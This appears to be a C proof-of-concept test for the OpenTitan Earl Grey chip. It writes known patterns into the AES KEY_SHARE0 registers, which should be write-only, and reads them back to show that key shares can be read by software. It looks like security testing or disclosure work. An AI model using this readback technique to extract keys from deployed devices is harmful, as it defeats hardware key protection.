#include "sw/device/lib/base/mmio.h"
#include "sw/device/lib/runtime/log.h"
#include "sw/device/lib/testing/test_framework/check.h"
#include "sw/device/lib/testing/test_framework/ottf_main.h"

/* Autogenerated top level address and register offsets provided by BUILD deps. */
#include "top_earlgrey.h"
#include "aes_regs.h"

OTTF_DEFINE_TEST_CONFIG();

bool test_main(void) {
  LOG_INFO("AES key_share0 readback POC start");

  /* Create MMIO region for AES registers. */
  mmio_region_t aes_base = mmio_region_from_addr(TOP_EARLGREY_AES_BASE_ADDR);

  /* Known patterns to write into KEY_SHARE0 registers. If the device is
   * vulnerable these exact values will be readable back from the same
   * addresses (reg2hw.key_share0[*].q is muxed onto the read bus).
   */
  const uint32_t test_values[8] = {
      0x11111111u, 0x22222222u, 0x33333333u, 0x44444444u,
      0x55555555u, 0x66666666u, 0x77777777u, 0x88888888u,
  };

  /* Write the patterns into the write-only KEY_SHARE0 registers. This uses
   * the normal software-visible write path. In a secure implementation the
   * corresponding reads would not return the written secret data.
   */
  for (int i = 0; i < 8; ++i) {
    ptrdiff_t offset = (ptrdiff_t) (AES_KEY_SHARE0_0_REG_OFFSET + (i * 4));
    LOG_INFO("Writing KEY_SHARE0[%d] at offset 0x%04x: 0x%08x", i, (unsigned)offset, test_values[i]);
    mmio_region_write32(aes_base, offset, test_values[i]);
  }

  /* Read back from the same addresses and check whether the stored share is
   * exposed. The vulnerability is demonstrated if the read values match the
   * written values.
   */
  for (int i = 0; i < 8; ++i) {
    ptrdiff_t offset = (ptrdiff_t) (AES_KEY_SHARE0_0_REG_OFFSET + (i * 4));
    uint32_t read = mmio_region_read32(aes_base, offset);
    LOG_INFO("Read  KEY_SHARE0[%d] at offset 0x%04x: 0x%08x", i, (unsigned)offset, read);
    CHECK(read == test_values[i], "KEY_SHARE0[%d] leaked: read 0x%08x != written 0x%08x", i, read, test_values[i]);
  }

  LOG_INFO("AES key_share0 readback POC succeeded - key share0 is software-readable");
  return true;
}
